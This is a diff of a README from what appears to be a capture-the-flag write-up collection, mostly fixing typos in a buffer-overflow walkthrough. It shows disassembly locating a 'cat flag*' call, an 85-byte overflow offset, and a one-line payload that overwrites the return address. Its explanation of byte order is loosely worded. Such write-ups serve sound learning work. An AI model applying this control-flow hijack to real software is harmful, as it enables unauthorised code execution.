kali-mx/ctf-writeups/README.md

 │       │   0x00400b0d      e8fefbffff     call sym.imp.printf         ; int printf(const char *format)
 │       │   0x00400b12      488d3da50a00.  lea rdi, str.cat_flag       ; 0x4015be ; "cat flag*" ; const char *string
  ```
-This section is the the juicy part.
+This section is the juicy part.
 It tells us the exact location address `0x00400b12` to point our payload.
 If we can get the program to crash right here, it should execute the `cat flag*` command and output the flag file.

-Using our BO offset of 85 bytes and the address of our cat function, putting it in Endian format, we construct the following payload2.
+Using our BO offset of 85 bytes and the address of our cat command, putting it in Endian format, we construct the following payload2.
-a quick note on Endian format.
+A quick note on Endian format.
 Take the address `0x00400b12` strip the last 3 hex numbers from it then place them in reverse order, inserting '\x' before each one:

 `echo -en "1\n$(cyclic 85)\x12\x0B\x40" > payload2 `